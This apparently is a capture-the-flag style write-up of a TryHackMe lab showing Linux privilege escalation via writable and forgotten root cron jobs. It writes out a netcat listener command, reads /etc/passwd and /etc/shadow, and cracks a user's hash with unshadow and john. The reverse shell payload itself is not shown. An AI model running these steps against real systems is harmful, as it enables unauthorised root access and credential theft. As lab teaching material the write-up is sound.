Crob Job to Root - Linux Escalation Privilege
Note: If you need to zoom in, you can click on the image.
What is Cron Job?
Cron job are used to schedule a script or binaries to be run at a specific time. Think of it as a Roomba (Robot Cleaner) that cleans the house at specific hour. By default, they run with the privilege of their owners and not the current user. Additionally, by default they are not vulnerable but under certain condition, this can lead to privilege escalation.
Cron job are located in: /etc/crontab. Here how it would look like:
The first star is Min, second star is Hour, third start is day of the month, fourth star is Month, fifth star is Day of the week. For example: Every Saturday at 23:45 (11:45 PM) would be: 45(min) 23 (hour) * * 6 (Day of the week - Monday, Tuesday, Wednesday, Thurs....) Now that we have establish some background knowledge of cronjob, let's discuss how to exploit any misconfiguration.
Demonstration:
I will be using the TryHackMe Linux Privilege Escalation room to show how to exploit Cronjob misconfiguration. Here is the link to the room: https://tryhackme.com/room/linprivesc.
First we need to print out all the Cronjobs that are available. We can use this command: cat /etc/crontab. It important to note that any users can view cron jobs that are available. There is no certain permission you have to get. This is the result:
Since we only care about getting root privilege we are only focus on the cronjob that are run by Root. However, in a real penetration test, you might need to build up your privilege before you can get root access. Nevertheless that what we are focus on. I have 4 cronjob that I can exploit:
I am going to pick /home/karen/backup.sh and then go over antivirus.sh later since that one is special. The script is currently at the /home directory of karen, we are going to that file location and change the content of that script to create a reverse shell back to our listener.
This is what is currently inside backup.sh:
and this is what we are going to change it to:
|
|
One useful tool creating reverse shell is: revshell.
Note: You are able to write to the file because you have write permission
After you edit backup.sh, make the script executable (chmod +x backup.sh). Now, let go back to the attacker machine and create a listener on port 6777. Then wait for 1 month for the cronjob to execute the script.
This command will create an listener at port 6777: nc -lvnp 6777
Here are the result:
We got root privilege :) Now, what tryhackme want next is to find what is the password for Matt. The first step we are going to do is read the content of /etc/passwd and put matt information in a separate file. Then we are going to do the same thing with /etc/shadow only focusing on matt information.
Then we are going run this command:
unshadow passwd.txt shadow.txt > matt_information.txt
Then we are going to start our brute force using this command:
john --wordlist=/usr/share/wordlists/rockyou.txt matt_information.txt
After the command is run, we see that we were able to crack matt password and it was 123456.
Exploiting forgotten Cron Jobs
TryHackMe put it in a way to understand it:
- System administrators need to run a script at regular intervals.
- They create a cron job to do this
- After a while, the script becomes useless, and they delete it
- They do not clean the relevant cron job
You can use the cron job to your leverage and escalate your privilege. What Cron job is doing is it actively looking for file within it path that matches the corresponding file. Once it found the file that it looking for (no matter where it is) it will execute it.
What the attacker is doing is creating an file name: antivirus.sh and putting an reverse shell back to the listener. Then, cronjob will execute that job and the attacker will get root privilege.
Here are some picture showing the process: Credit goes to TryHackMe
That’s all, thank you for reading.